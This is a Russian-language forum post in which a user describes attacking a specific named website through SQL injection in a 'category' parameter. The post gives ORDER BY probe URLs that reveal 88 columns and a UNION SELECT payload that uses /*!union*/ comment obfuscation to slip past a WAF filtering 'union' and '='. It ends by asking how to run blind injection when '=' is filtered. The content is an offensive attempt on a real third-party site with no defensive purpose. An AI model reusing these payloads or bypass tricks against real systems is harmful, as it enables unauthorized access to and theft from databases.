|
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами:
8063606
Репутация:
-1
|
|
Сообщение от Qwert321
это понятно... только вывод не сделать никак, 406 ошибку выдает... я так понимаю в браузере дело... каким лучше пользоваться?
...или я чего-то недогоняю... все методы пробовал... и error based не катит...
вообщем там WAF, и два запроса к базе:
1. http://www.dob.ee/listings.php?category=399)+order+by+2%23 - false, true
2.http://www.dob.ee/listings.php?category=399)+order+by+89%23 - false, false (в моей практике впервые столько колонок (88))
+ еще фильтрация union, и =, походу но может и еще на что то, можно пробывать так но чет не пляшет нифига:
Код:
http://www.dob.ee/listings.php?category=333)+/*!union*/+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88%23
походу просто нет принтабельных полей а это значит - blind,
но как раскрутить слепую с фильтром знака "=" я незнаю((
|